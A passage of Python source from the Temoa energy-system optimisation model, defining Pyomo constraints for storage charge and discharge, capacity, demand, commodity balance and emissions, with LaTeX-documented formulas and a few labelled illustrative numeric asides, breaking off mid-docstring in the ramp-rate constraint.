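# full output is 3600 GJ = 0.0036 PJ.
def gw_hours_to_pj(capacity_gw, hours):
    return capacity_gw * hours * 3600 / 10 ** 6

assert gw_hours_to_pj(1, 1) == 0.0036   # 1 GW for 1 h
assert gw_hours_to_pj(1, 8) == 0.0288   # the 8-hour battery bound used above
# ---------------------------------------------------------------------------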
Convert GJ/s to PJ/h, and this is the maximum that can flow out of the battery in 1 hour\n#\n# \thourly_discharge = sum( M.V_FlowOut[p, s, d, S_i, t, S_v, S_o]\n# \t for S_v in M.ProcessVintages( p, t )\n# \t for S_o in M.ProcessOutputs( p, t, S_v )\n# \t for S_i in M.ProcessInputsByOutput( p, t, S_v, S_o )\n# \t) * value( M.SegFrac[s,d] )\n#\n# \tmax_discharge = M.V_CapacityAvailableByPeriodAndTech[p,t] * 3600/10**6 #converts GWh to PJ, treats each time slice as 1 hour\n#\n# #\thourly_discharge = sum( M.V_FlowOut[p, s, d, S_i, t, S_v, S_o]\n# #\t for S_v in ProcessVintages( p, t )\n# #\t for S_o in ProcessOutputs( p, t, S_v )\n# #\t for S_i in ProcessInputsByOutput( p, t, S_v, S_o )\n# #\t)\n#\n# #\tmax_discharge = M.V_CapacityAvailableByPeriodAndTech[p,t] * (value( M.CapacityToActivity[t] ) * value( M.SegFrac[s,d] )) #converts GWh to PJ, treats each time slice as 92 hours\n#\n# \texpr = ( hourly_discharge <= max_discharge ) #energy discharge rate cannot exceed the capacity of the battery (in GW)\n#\n# \treturn expr\n\ndef StorageEnergy_Constraint(M, p, s, d, t, v):\n r\"\"\"\nThis constraint tracks the amount of storage level (:math:`\\textbf{SL}_{p, s, d, t, v}`)\nassuming ordered time slices. The initial storage charge level is optimized\nfor the first time slice in each period, and then the charge level is updated each time\nslice based on the amount of energy stored or discharged. At the end of the last time\nslice associated with each period, the charge level must equal the starting charge level.\nIn the formulation below, note that :math:`\\textbf{stored_energy}` is an internal model\ndecision variable.\n\nFirst, the amount of stored energy in a given time slice is calculated as the\ndifference between the amount of energy stored (first term) and the amount of energy\ndispatched (second term). Note that the storage device's roundtrip efficiency is applied\non the input side:\n.. math::\n :label: StorageEnergy\n \\textbf{stored_energy} =\n \\sum_{I, O} \\textbf{FIS}_{p, s, d, i, t, v, o} \\cdot\n EFF_{i,t,v,o}\n -\n \\sum_{I, O} \\textbf{FO}_{p, s, d, i, t, v, o}\n\nWith :math:`\\bf{stored\\_energy}` calculated, the storage\ncharge level (:math:`\\textbf{SL}_{p,s,d,t,v}`) is updated, but the update procedure varies\nbased on the time slice within each time period. For the first season and time-of-day within\na given period:\n.. math::\n \\textbf{SL}_{p, s, d, t, v} = \\textbf{SI}_{t,v} + \\textbf{stored_energy}\nFor the first time-of-day slice in any other season except the first:\n.. math::\n \\textbf{SL}_{p, s, d, t, v} =\n \\textbf{SL}_{p, s_{prev}, d_{last}, t, v} + \\textbf{stored_energy}\nFor the last season and time-of-day in the year, the ending storage charge level\nshould be equal to the starting charge level:\n.. math::\n \\textbf{SL}_{p, s, d, t, v} + \\textbf{stored_energy} = \\textbf{SI}_{t,v}\nFor all other time slices not explicitly outlined above:\n.. math::\n \\textbf{SL}_{p, s, d, t, v} = \\textbf{SL}_{p, s, d_{prev}, t, v} + \\textbf{stored_energy}\nAll equations below are sparsely indexed such that:\n.. 
math::\n \\forall \\{p, s, d, t, v\\} \\in \\Theta_{\\text{StorageEnergy}}\n\n\"\"\"\n # This is the sum of all input=i sent TO storage tech t of vintage v with\n # output=o in p,s,d\n charge = sum(\n M.V_FlowIn[p, s, d, S_i, t, v, S_o] * M.Efficiency[S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_i in M.ProcessInputs(p, t, S_v)\n for S_o in M.ProcessOutputsByInput(p, t, S_v, S_i)\n )\n\n # This is the sum of all output=o withdrawn FROM storage tech t of vintage v\n # with input=i in p,s,d\n discharge = sum(\n M.V_FlowOut[p, s, d, S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_o in M.ProcessOutputs(p, t, S_v)\n for S_i in M.ProcessInputsByOutput(p, t, S_v, S_o)\n )\n\n stored_energy = charge - discharge\n\n # This storage formulation allows stored energy to carry over through\n # time of day and seasons, but must be zeroed out at the end of each period, i.e.,\n # the last time slice of the last season must zero out\n if d == M.time_of_day.last() and s == M.time_season.last():\n d_prev = M.time_of_day.prev(d)\n expr = M.V_StorageLevel[p, s, d_prev, t, v] + stored_energy == M.V_StorageInit[t, v]\n\n # First time slice of the first season (i.e., start of period), starts at full charge\n elif d == M.time_of_day.first() and s == M.time_season.first():\n expr = M.V_StorageLevel[p, s, d, t, v] == M.V_StorageInit[t, v] + stored_energy\n\n # First time slice of any season that is NOT the first season\n elif d == M.time_of_day.first():\n d_last = M.time_of_day.last()\n s_prev = M.time_season.prev(s)\n expr = (\n M.V_StorageLevel[p, s, d, t, v]\n == M.V_StorageLevel[p, s_prev, d_last, t, v] + stored_energy\n )\n\n # Any time slice that is NOT covered above (i.e., not the time slice ending\n # the period, or the first time slice of any season)\n else:\n d_prev = M.time_of_day.prev(d)\n expr = (\n M.V_StorageLevel[p, s, d, t, v]\n == M.V_StorageLevel[p, s, d_prev, t, v] + stored_energy\n )\n\n return expr\n\n\ndef StorageEnergyUpperBound_Constraint(M, p, s, d, t, v):\n r\"\"\"\nThis constraint ensures that the amount of energy stored does not exceed\nthe upper bound set by the energy capacity of the storage device, as calculated\non the right-hand side.\nBecause the number and duration of time slices are user-defined, we need to adjust\nthe storage duration, which is specified in hours. First, the hourly duration is divided\nby the number of hours in a year to obtain the duration as a fraction of the year.\nSince the :math:`C2A` parameter assumes the conversion of capacity to annual activity,\nwe need to express the storage duration as fraction of a year. Then, :math:`SEG_{s,d}`\nsummed over the time-of-day slices (:math:`d`) multiplied by 365 days / yr yields the\nnumber of days per season. This step is necessary because conventional time sliced models\nuse a single day to represent many days within a given season. Thus, it is necessary to\nscale the storage duration to account for the number of days in each season.\n\n.. 
math::\n :label: StorageEnergyUpperBound\n\n\"\"\"\n energy_capacity = (\n M.V_Capacity[t, v]\n * M.CapacityToActivity[t]\n * (M.StorageDuration[t] / 8760)\n * sum(M.SegFrac[s, S_d] for S_d in M.time_of_day) * 365\n * value(M.ProcessLifeFrac[p, t, v])\n )\n expr = M.V_StorageLevel[p, s, d, t, v] <= energy_capacity\n\n return expr\n\n\ndef StorageChargeRate_Constraint(M, p, s, d, t, v):\n r\"\"\"\n This constraint ensures that the charge rate of the storage unit is\n limited by the power capacity (typically GW) of the storage unit.\n\"\"\"\n # Calculate energy charge in each time slice\n slice_charge = sum(\n M.V_FlowIn[p, s, d, S_i, t, v, S_o] * M.Efficiency[S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_i in M.ProcessInputs(p, t, S_v)\n for S_o in M.ProcessOutputsByInput(p, t, S_v, S_i)\n )\n\n # Maximum energy charge in each time slice\n max_charge = (\n M.V_Capacity[t, v]\n * M.CapacityToActivity[t]\n * M.SegFrac[s, d]\n * value(M.ProcessLifeFrac[p, t, v])\n )\n\n # Energy charge cannot exceed the power capacity of the storage unit\n expr = slice_charge <= max_charge\n\n return expr\n\n\ndef StorageDischargeRate_Constraint(M, p, s, d, t, v):\n r\"\"\"\n\tThis constraint ensures that the discharge rate of the storage unit\n\tis limited by the power capacity (typically GW) of the storage unit.\n\"\"\"\n # Calculate energy discharge in each time slice\n slice_discharge = sum(\n M.V_FlowOut[p, s, d, S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_o in M.ProcessOutputs(p, t, S_v)\n for S_i in M.ProcessInputsByOutput(p, t, S_v, S_o)\n )\n\n # Maximum energy discharge in each time slice\n max_discharge = (\n M.V_Capacity[t, v]\n * M.CapacityToActivity[t]\n * M.SegFrac[s, d]\n * value(M.ProcessLifeFrac[p, t, v])\n )\n\n # Energy discharge cannot exceed the capacity of the storage unit\n expr = slice_discharge <= max_discharge\n\n return expr\n\n\ndef StorageThroughput_Constraint(M, p, s, d, t, v):\n r\"\"\"\nIt is not enough to only limit the charge and discharge rate separately. We also\nneed to ensure that the maximum throughput (charge + discharge) does not exceed\nthe capacity (typically GW) of the storage unit.\n\"\"\"\n discharge = sum(\n M.V_FlowOut[p, s, d, S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_o in M.ProcessOutputs(p, t, S_v)\n for S_i in M.ProcessInputsByOutput(p, t, S_v, S_o)\n )\n\n charge = sum(\n M.V_FlowIn[p, s, d, S_i, t, v, S_o] * M.Efficiency[S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_i in M.ProcessInputs(p, t, S_v)\n for S_o in M.ProcessOutputsByInput(p, t, S_v, S_i)\n )\n\n throughput = charge + discharge\n max_throughput = (\n M.V_Capacity[t, v]\n * M.CapacityToActivity[t]\n * M.SegFrac[s, d]\n * value(M.ProcessLifeFrac[p, t, v])\n )\n expr = throughput <= max_throughput\n return expr\n\n\ndef StorageInit_Constraint(M,t,v):\n r\"\"\"\nThis constraint is used if the users wishes to force a specific initial storage charge level\nfor certain storage technologies and vintages. In this case, the value of the decision variable\n:math:`\\textbf{SI}_{t,v}` is set by this constraint rather than being optimized.\nUser-specified initial storage charge levels that are sufficiently different from the optimial\n:math:`\\textbf{SI}_{t,v}` could impact the cost-effectiveness of storage. 
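# --- Illustrative aside (not from the original model) -----------------------
# Numeric sketch of the StorageEnergyUpperBound right-hand side described
# above, with invented inputs: 2 GW of 4-hour storage, C2A = 31.54
# (GW -> PJ/yr), a season whose SegFrac values sum to 0.25 of the year,
# and ProcessLifeFrac = 1.
cap_gw, c2a, duration_h = 2.0, 31.54, 4.0
season_frac, life_frac = 0.25, 1.0
energy_cap = cap_gw * c2a * (duration_h / 8760) * season_frac * 365 * life_frac
print(round(energy_cap, 4))   # ~2.6283 PJ: the ceiling on V_StorageLevel
# ---------------------------------------------------------------------------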
For example, if the\noptimial initial charge level happens to be 50% of the full energy capacity, forced initial\ncharge levels (specified by parameter :math:`SIF_{t,v}`) equal to 10% or 90% of the full energy\ncapacity could lead to more expensive solutions.\n.. math::\n :label: StorageInit\n \\textbf{SI}_{t, v} \\le\n \\ SIF_{t,v}\n \\cdot\n \\textbf{CAP}_{t,v} \\cdot C2A_{t} \\cdot \\frac {SD_{t}}{8760 hrs/yr}\n \\cdot \\sum_{d} SEG_{s_{first},d} \\cdot 365 days/yr\n \\\\\n \\forall \\{t, v\\} \\in \\Theta_{\\text{StorageInit}}\n\"\"\"\n\n s = M.time_season.first()\n energy_capacity = (\n M.V_Capacity[t, v]\n * M.CapacityToActivity[t]\n * (M.StorageDuration[t] / 8760)\n * sum(M.SegFrac[s,S_d] for S_d in M.time_of_day) * 365\n * value(M.ProcessLifeFrac[v, t, v])\n )\n\n expr = M.V_StorageInit[t,v] == energy_capacity * M.StorageInitFrac[t,v]\n\n return expr\n\n\n\ndef TechInputSplit_Constraint(M, p, s, i, t, v):\n r\"\"\"\n\nAllows users to specify fixed or minimum shares of commodity inputs to a process \nproducing a single output. These shares can vary by model time period. See \nTechOutputSplit_Constraint for an analogous explanation.\n\"\"\"\n inp = sum(M.V_FlowIn[p, s, d, i, t, v, S_o]\n for S_o in M.ProcessOutputsByInput(p, t, v, i)\n for d in M.time_of_day\n\n )\n\n total_inp = sum(M.V_FlowIn[p, s, d, S_i, t, v, S_o]\n for S_i in M.ProcessInputs(p, t, v)\n for S_o in M.ProcessOutputsByInput(p, t, v, i)\n for d in M.time_of_day\n )\n\n expr = (inp >= M.TechInputSplit[p, i, t] * total_inp)\n return expr\n\n\ndef TechOutputSplit_Constraint(M, p, s, d, t, v, o):\n r\"\"\"\n\nSome processes take a single input and make multiple outputs, and the user would like to \nspecify either a constant or time-varying ratio of outputs per unit input. The most \ncanonical example is an oil refinery. Crude oil is used to produce many different refined \nproducts. In many cases, the modeler would like to specify a minimum share of each refined \nproduct produced by the refinery.\n\nFor example, a hypothetical (and highly simplified) refinery might have a crude oil input \nthat produces 4 parts diesel, 3 parts gasoline, and 2 parts kerosene. The relative \nratios to the output then are:\n\n.. math::\n\n d = \\tfrac{4}{9} \\cdot \\text{total output}, \\qquad\n g = \\tfrac{3}{9} \\cdot \\text{total output}, \\qquad\n k = \\tfrac{2}{9} \\cdot \\text{total output}\n\nNote that it is possible to specify output shares that sum to less than unity. In such \ncases, the model optimizes the remaining share. In addition, it is possible to change the \nspecified shares by model time period. The constraint is formulated as follows:\n\n.. math::\n :label: TechOutputSplit\n\n \\sum_{I} \\textbf{FO}_{p, s, d, i, t, v, o}\n \\geq\n SPL_{p, t, o} \\cdot \\textbf{ACT}_{p, s, d, t, v}\n\n \\forall \\{p, s, d, t, v, o\\} \\in \\Theta_{\\text{split output}}\n\"\"\"\n out = sum(M.V_FlowOut[p, s, d, S_i, t, v, o]\n for S_i in M.ProcessInputsByOutput(p, t, v, o))\n\n expr = (out >= M.TechOutputSplit[p, t, o] * M.V_Activity[p, s, d, t, v])\n return expr\n\n\ndef Activity_Constraint(M, p, s, d, t, v):\n r\"\"\"\nThe Activity constraint defines the Activity convenience variable. The Activity\nvariable is mainly used in the objective function to calculate the cost\nassociated with use of a technology. 
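# --- Illustrative aside (not from the original model) -----------------------
# Worked version of the refinery example in the TechOutputSplit discussion
# above: 4 parts diesel, 3 parts gasoline, 2 parts kerosene per unit of
# crude, so the minimum output shares are 4/9, 3/9 and 2/9 of activity.
parts = {"diesel": 4, "gasoline": 3, "kerosene": 2}
total = sum(parts.values())                        # 9
shares = {k: v / total for k, v in parts.items()}
activity = 90.0                                    # invented activity level
for fuel, share in shares.items():
    # Each output flow must satisfy: flow_out >= share * activity
    print(fuel, ">=", share * activity)            # 40.0 / 30.0 / 20.0
# ---------------------------------------------------------------------------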
In English, this constraint states that\n\"the activity of a process is the sum of its outputs.\"\n\nThere is one caveat to keep in mind in regards to the Activity variable: if\nthere is more than one output, there is currently no attempt by Temoa to convert\nto a common unit of measurement. For example, common measurements for heat\ninclude mass of steam at a given temperature, or total BTUs, while electricity\nis generally measured in a variant of watt-hours. Reconciling these units of\nmeasurement, as for example with a cogeneration plant, is currently left as an\naccounting exercise for the modeler.\n\n.. math::\n :label: Activity\n\n \\textbf{ACT}_{p, s, d, t, v} = \\sum_{I, O} \\textbf{FO}_{p,s,d,i,t,v,o}\n\n \\\\\n \\forall \\{p, s, d, t, v\\} \\in \\Theta_{\\text{activity}}\n\"\"\"\n activity = sum(\n M.V_FlowOut[p, s, d, S_i, t, v, S_o]\n\n for S_i in M.ProcessInputs(p, t, v)\n for S_o in M.ProcessOutputsByInput(p, t, v, S_i)\n )\n\n expr = (M.V_Activity[p, s, d, t, v] == activity)\n return expr\n\n\ndef Capacity_Constraint(M, p, s, d, t, v):\n r\"\"\"\n\nTemoa's definition of a process' capacity is the total size of installation\nrequired to meet all of that process' demands. The Activity convenience\nvariable represents exactly that, so the calculation on the left hand side of\nthe inequality is the maximum amount of energy a process can produce in the time\nslice ````.\n\n.. math::\n :label: Capacity\n\n \\left (\n \\text{CFP}_{t, v}\n \\cdot \\text{C2A}_{t}\n \\cdot \\text{SEG}_{s, d}\n \\cdot \\text{TLF}_{p, t, v}\n \\right )\n \\cdot \\textbf{CAP}_{t, v}\n \\ge\n \\textbf{ACT}_{p, s, d, t, v}\n\n \\\\\n \\forall \\{p, s, d, t, v\\} \\in \\Theta_{\\text{activity}}\n\"\"\"\n\n if t in M.tech_storage:\n return Constraint.Skip\n\n produceable = (\n (value(M.CapacityFactorProcess[s, d, t, v])\n * value(M.CapacityToActivity[t])\n * value(M.SegFrac[s, d]))\n * value(M.ProcessLifeFrac[p, t, v])\n * M.V_Capacity[t, v]\n * value(M.CapReduction[p, t, v])) # JB - added v\n\n expr = (produceable >= M.V_Activity[p, s, d, t, v])\n return expr\n\n\n# sudan\ndef availableActivity_Constraint(M, p, t, v):\n # This is max produceable in a given year by a perticular technology\n max_produceable = sum((\n (value(M.CapacityFactorProcess[S_s, S_d, t, S_v])\n * value(M.CapacityToActivity[t])\n * value(M.SegFrac[S_s, S_d]))\n * value(M.ProcessLifeFrac[p, t, S_v])\n * M.V_Capacity[t, S_v]\n * value(M.CapReduction[p, t, S_v])) # JB - added 'S_v\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(p, t))\n\n # This is what is produced in a year by a particular technology\n activity_pt = sum(M.V_Activity[p, S_s, S_d, t, S_v]\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(p, t))\n\n # If not then we have to deduct the produceable from the capacity built in the current year\n if t in M.delay:\n # Produceable from capacity built in the current year\n most_recent = sum((value(M.CapacityFactorProcess[S_s, S_d, t, S_v])\n * value(M.CapacityToActivity[t])\n * value(M.SegFrac[S_s, S_d]))\n\t\t\t\t\t\t * value(M.ProcessLifeFrac[p, t, S_v])\n\t\t\t\t\t\t * M.V_Capacity[t, S_v]\n\t\t\t\t\t\t * value(M.CapReduction[p, t, S_v]) # JB - added S_v\n\t\t\t\t\t\t for S_s in M.time_season\n\t\t\t\t\t\t for S_d in M.time_of_day\n\t\t\t\t\t\t for S_v in M.ProcessVintages(p, t)\n\t\t\t\t\t\t if S_v == p)\n max_produceable_delay = max_produceable - most_recent;\n expr = (activity_pt <= max_produceable_delay)\n return expr\n # If the technology has existing 
capacity then all good - then this constraint is same as previous constraint\n else:\n expr = (activity_pt <= max_produceable)\n return expr\n\n\ndef ExistingCapacity_Constraint(M, t, v):\n r\"\"\"\n\nTemoa treats residual capacity from before the model's optimization horizon as\nregular processes, that require the same parameter specification in the data\nfile as do new vintage technologies (e.g. entries in the efficiency table),\nexcept the :code:`CostInvest` parameter. This constraint sets the capacity of\nprocesses for model periods that exist prior to the optimization horizon to\nuser-specified values.\n\n.. math::\n :label: ExistingCapacity\n\n \\textbf{CAP}_{t, v} = ECAP_{t, v}\n\n \\forall \\{t, v\\} \\in \\Theta_{\\text{existing}}\n\"\"\"\n expr = (M.V_Capacity[t, v] == M.ExistingCapacity[t, v])\n return expr\n\n\ndef ResourceExtraction_Constraint(M, p, r):\n r\"\"\"\n\nThe ResourceExtraction constraint allows a modeler to specify an annual limit on\nthe amount of a particular resource Temoa may use in a period.\n\n.. math::\n :label: ResourceExtraction\n\n \\sum_{S, D, I, t \\in T^r, V} \\textbf{FO}_{p, s, d, i, t, v, c} \\le RSC_{p, c}\n\n \\forall \\{p, c\\} \\in \\Theta_{\\text{resource bound parameter}}\n\"\"\"\n collected = sum(\n M.V_FlowOut[p, S_s, S_d, S_i, S_t, S_v, r]\n\n for S_t, S_v in M.ProcessesByPeriodAndOutput(p, r)\n if S_t in M.tech_resource\n for S_i in M.ProcessInputsByOutput(p, S_t, S_v, r)\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n expr = (collected <= M.ResourceBound[p, r])\n return expr\n\n\ndef CommodityBalance_Constraint(M, p, s, d, c):\n r\"\"\"\n\nWhere the Demand constraint :eq:`Demand` ensures that end-use demands are met,\nthe CommodityBalance constraint ensures that the internal system demands are\nmet. That is, this is the constraint that ties the output of one process to the\ninput of another. At the same time, this constraint also conserves energy\nbetween process. (But it does not account for transmission loss.) In this\nmanner, it is a corollary to both the ProcessBalance :eq:`ProcessBalance` and\nDemand :eq:`Demand` constraints.\n\n.. math::\n :label: CommodityBalance\n\n \\sum_{I, T, V} \\textbf{FO}_{p, s, d, i, t, v, c}\n =\n \\sum_{T, V, O} \\textbf{FI}_{p, s, d, c, t, v, o}\n\n \\\\\n \\forall \\{p, s, d, c\\} \\in \\Theta_{\\text{commodity balance}}\n\"\"\"\n if c in M.commodity_demand:\n return Constraint.Skip\n\n vflow_in = sum(\n M.V_FlowIn[p, s, d, c, S_t, S_v, S_o]\n\n for S_t, S_v in M.helper_commodityDStreamProcess[p, c]\n for S_o in M.helper_ProcessOutputsByInput[p, S_t, S_v, c]\n )\n\n vflow_out = sum(\n M.V_FlowOut[p, s, d, S_i, S_t, S_v, c]\n\n for S_t, S_v in M.helper_commodityUStreamProcess[p, c]\n for S_i in M.helper_ProcessInputsByOutput[(p, S_t, S_v, c)]\n )\n\n CommodityBalanceConstraintErrorCheck(vflow_out, vflow_in, p, s, d, c)\n\n expr = (vflow_out == vflow_in)\n return expr\n\n\ndef ProcessBalance_Constraint(M, p, s, d, i, t, v, o):\n r\"\"\"\n\nThe ProcessBalance constraint is one of the most fundamental constraints in the\nTemoa model. It defines the basic relationship between the energy entering a\nprocess (:math:`\\textbf{FI}`) and the energy leaving a processing\n(:math:`\\textbf{FO}`). This constraint sets the :code:`FlowOut` variable, upon\nwhich all other constraints rely.\n\nConceptually, this constraint treats every process as a \"black box,\" caring only\nabout the process efficiency. 
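# --- Illustrative aside (not from the original model) -----------------------
# The "black box" relation described in the surrounding ProcessBalance
# docstring, reduced to one line. (Note the docstring speaks of an
# inequality, while the rule itself, just below, enforces the equality
# FO == EFF * FI.)
def flow_out(flow_in, efficiency):
    return flow_in * efficiency

assert flow_out(100.0, 0.35) == 35.0   # a 35%-efficient plant: 100 in, 35 out
# ---------------------------------------------------------------------------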
In other words, the amount of energy leaving a\nprocess cannot exceed the amount coming in.\n\nNote that this constraint is an inequality -- not a strict equality. In most\nsane cases, the optimal solution should make this constraint and supply should\nexactly meet demand. If this constraint is not binding, it is likely a clue\nthat the model under inspection could be more tightly specified and has at least\none input data anomaly.\n\n.. math::\n :label: ProcessBalance\n\n \\textbf{FO}_{p, s, d, i, t, v, o}\n \\le\n EFF_{i, t, v, o}\n \\cdot \\textbf{FI}_{p, s, d, i, t, v, o}\n\n \\\\\n \\forall \\{p, s, d, i, t, v, o\\} \\in \\Theta_{\\text{valid process flows}}\n\"\"\"\n expr = (\n M.V_FlowOut[p, s, d, i, t, v, o]\n ==\n M.V_FlowIn[p, s, d, i, t, v, o]\n * value(M.Efficiency[i, t, v, o])\n )\n\n return expr\n\n\ndef DemandActivity_Constraint(M, p, s, d, t, v, dem, s_0, d_0):\n r\"\"\"\n\nFor end-use demands, it is unreasonable to let the optimizer only allow use in a\nsingle time slice. For instance, if household A buys a natural gas furnace\nwhile household B buys an electric furnace, then both units should be used\nthroughout the year. Without this constraint, the model might choose to only\nuse the electric furnace during the day, and the natural gas furnace during the\nnight.\n\nThis constraint ensures that the ratio of a process activity to demand is\nconstant for all time slices. Note that if a demand is not specified in a given\ntime slice, or is zero, then this constraint will not be considered for that\nslice and demand. This is transparently handled by the :math:`\\Theta` superset.\n\n.. math::\n :label: DemandActivity\n\n DEM_{p, s, d, dem} \\cdot \\sum_{I} \\textbf{FO}_{p, s_0, d_0, i, t, v, dem}\n =\n DEM_{p, s_0, d_0, dem} \\cdot \\sum_{I} \\textbf{FO}_{p, s, d, i, t, v, dem}\n\n \\\\\n \\forall \\{p, s, d, t, v, dem, s_0, d_0\\} \\in \\Theta_{\\text{demand activity}}\n\"\"\"\n\n DSD = M.DemandSpecificDistribution # lazy programmer\n act_a = sum(\n M.V_FlowOut[p, s_0, d_0, S_i, t, v, dem]\n\n for S_i in M.ProcessInputsByOutput(p, t, v, dem)\n )\n act_b = sum(\n M.V_FlowOut[p, s, d, S_i, t, v, dem]\n\n for S_i in M.ProcessInputsByOutput(p, t, v, dem)\n )\n\n expr = (\n act_a * DSD[s, d, dem]\n ==\n act_b * DSD[s_0, d_0, dem]\n )\n return expr\n\n\ndef Demand_Constraint(M, p, s, d, dem):\n r\"\"\"\n\nThe Demand constraint drives the model. This constraint ensures that supply at\nleast meets the demand specified by the Demand parameter in all periods and\nslices, by ensuring that the sum of all the demand output commodity (:math:`c`)\ngenerated by :math:`\\textbf{FO}` must meet the modeler-specified demand, in\neach time slice.\n\n.. math::\n :label: Demand\n\n \\sum_{I, T, V} \\textbf{FO}_{p, s, d, i, t, v, dem}\n \\ge\n {DEM}_{p, dem} \\cdot {DSD}_{s, d, dem}\n\n \\\\\n \\forall \\{p, s, d, dem\\} \\in \\Theta_{\\text{demand}}\n\nNote that the validity of this constraint relies on the fact that the\n:math:`C^d` set is distinct from both :math:`C^e` and :math:`C^p`. In other\nwords, an end-use demand must only be an end-use demand. Note that if an output\ncould satisfy both an end-use and internal system demand, then the output from\n:math:`\\textbf{FO}` would be double counted.\n\nNote also that this constraint is an inequality, not a strict equality. 
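# --- Illustrative aside (not from the original model) -----------------------
# Numeric reading of the DemandActivity constraint above: the ratio of a
# process's output to the demand share must be identical in every time
# slice. With invented numbers for two slices a=(s_0, d_0) and b=(s, d):
dsd_a, dsd_b = 0.30, 0.10          # DemandSpecificDistribution shares
act_a, act_b = 6.0, 2.0            # flows serving the demand in each slice
assert abs(act_a * dsd_b - act_b * dsd_a) < 1e-12   # 0.6 == 0.6: output tracks the profile
# ---------------------------------------------------------------------------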
\"Supply\nmust meet or exceed demand.\" Like with the ProcessBalance constraint, if this\nconstraint is not binding, it may be a clue that the model under inspection\ncould be more tightly specified and could have at least one input data anomaly.\n\n\"\"\"\n supply = sum(\n M.V_FlowOut[p, s, d, S_i, S_t, S_v, dem]\n\n for S_t, S_v in M.helper_commodityUStreamProcess[p, dem]\n for S_i in M.helper_ProcessInputsByOutput[p, S_t, S_v, dem]\n )\n\n DemandConstraintErrorCheck(supply, p, s, d, dem)\n\n expr = (supply >= M.Demand[p, dem] * M.DemandSpecificDistribution[s, d, dem])\n\n return expr\n\n\ndef GrowthRateConstraint_rule(M, p, t):\n GRS = value(M.GrowthRateSeed[t])\n GRM = value(M.GrowthRateMax[t])\n CapPT = M.V_CapacityAvailableByPeriodAndTech\n\n periods = sorted(set(p_ for p_, t_ in CapPT if t_ == t))\n\n if p not in periods:\n return Constraint.Skip\n\n if p == periods[0]:\n expr = (CapPT[p, t] <= GRS)\n\n else:\n p_prev = periods.index(p)\n p_prev = periods[p_prev - 1]\n\n expr = (CapPT[p, t] <= GRM * CapPT[p_prev, t] + GRS)\n\n return expr\n\n\n##############################################################################\n# Additional and derived (informational) variable constraints\n\n\ndef ActivityByPeriodAndProcess_Constraint(M, p, t, v):\n if p < v or v not in M.ProcessVintages(p, t):\n return Constraint.Skip\n\n activity = sum(\n M.V_Activity[p, S_s, S_d, t, v]\n\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n if int is type(activity):\n return Constraint.Skip\n\n expr = (M.V_ActivityByPeriodAndProcess[p, t, v] == activity)\n return expr\n\n\n# This is required for MGA objective function\ndef ActivityByTech_Constraint(M, t):\n activity = sum(\n M.V_Activity[S_p, S_s, S_d, t, S_v]\n\n for S_p in M.time_optimize\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(S_p, t)\n )\n\n if int is type(activity):\n return Constraint.Skip\n\n expr = (M.V_ActivityByTech[t] == activity)\n return expr\n\n\ndef CapacityAvailableByPeriodAndTech_Constraint(M, p, t):\n r\"\"\"\nThe :math:`\\textbf{CAPAVL}` variable is nominally for reporting solution values,\nbut is also used in the Max and Min constraint calculations. For any process\nwith an end-of-life (EOL) on a period boundary, all of its capacity is available\nfor use in all periods in which it is active (the process' TLF is 1). However,\nfor any process with an EOL that falls between periods, Temoa makes the\nsimplifying assumption that the available capacity from the expiring technology\nis available through the whole period, but only as much percentage as its\nlifespan through the period. For example, if a process expires 3 years into an\n8 year period, then only :math:`\\frac{3}{8}` of the installed capacity is\navailable for use throughout the period.\n\n.. 
math::\n :label: CapacityAvailable\n\n \\textbf{CAPAVL}_{p, t} = \\sum_{V} {TLF}_{p, t, v} \\cdot \\textbf{CAP}\n\n \\\\\n \\forall p \\in \\text{P}^o, t \\in T\n\"\"\"\n cap_avail = sum(\n value(M.ProcessLifeFrac[p, t, S_v])\n * M.V_Capacity[t, S_v]\n\n for S_v in M.ProcessVintages(p, t)\n )\n\n expr = (M.V_CapacityAvailableByPeriodAndTech[p, t] == cap_avail)\n return expr\n\n\ndef EnergyConsumptionByPeriodInputAndTech_Constraint(M, p, i, t):\n energy_used = sum(\n M.V_FlowIn[p, S_s, S_d, i, t, S_v, S_o]\n\n for S_v in M.ProcessVintages(p, t)\n for S_o in M.ProcessOutputsByInput(p, t, S_v, i)\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n expr = (M.V_EnergyConsumptionByPeriodInputAndTech[p, i, t] == energy_used)\n return expr\n\n\ndef ActivityByPeriodTechAndOutput_Constraint(M, p, t, o):\n activity = sum(\n M.V_FlowOut[p, S_s, S_d, S_i, t, S_v, o]\n\n for S_v in M.ProcessVintages(p, t)\n for S_i in M.ProcessInputsByOutput(p, t, S_v, o)\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n if int is type(activity):\n return Constraint.Skip\n\n expr = (M.V_ActivityByPeriodTechAndOutput[p, t, o] == activity)\n return expr\n\n\ndef EmissionActivityByPeriodAndTech_Constraint(M, e, p, t):\n emission_total = sum(\n M.V_FlowOut[p, S_s, S_d, S_i, t, S_v, S_o]\n * M.EmissionActivity[e, S_i, t, S_v, S_o]\n\n for tmp_e, S_i, S_t, S_v, S_o in M.EmissionActivity.sparse_iterkeys()\n if tmp_e == e and S_t == t\n if M.ValidActivity(p, S_t, S_v)\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n if type(emission_total) is int:\n return Constraint.Skip\n\n expr = (M.V_EmissionActivityByPeriodAndTech[e, p, t] == emission_total)\n return expr\n\n\ndef RampUpDay_Constraint(M, p, s, d, t, v):\n # M.time_of_day is a sorted set, and M.time_of_day.first() returns the first\n # element in the set, similarly, M.time_of_day.last() returns the last element.\n # M.time_of_day.prev(d) function will return the previous element before s, and\n # M.time_of_day.next(d) function will return the next element after s.\n\n r\"\"\"\nThe ramp rate constraint is utilized to limit the rate of electricity generation \nincrease and decrease between two adjacent time slices in order to account for \nphysical limits associated with thermal power plants. Note that this constriant \nonly applies to technologies with ramp capability, which is defined in set 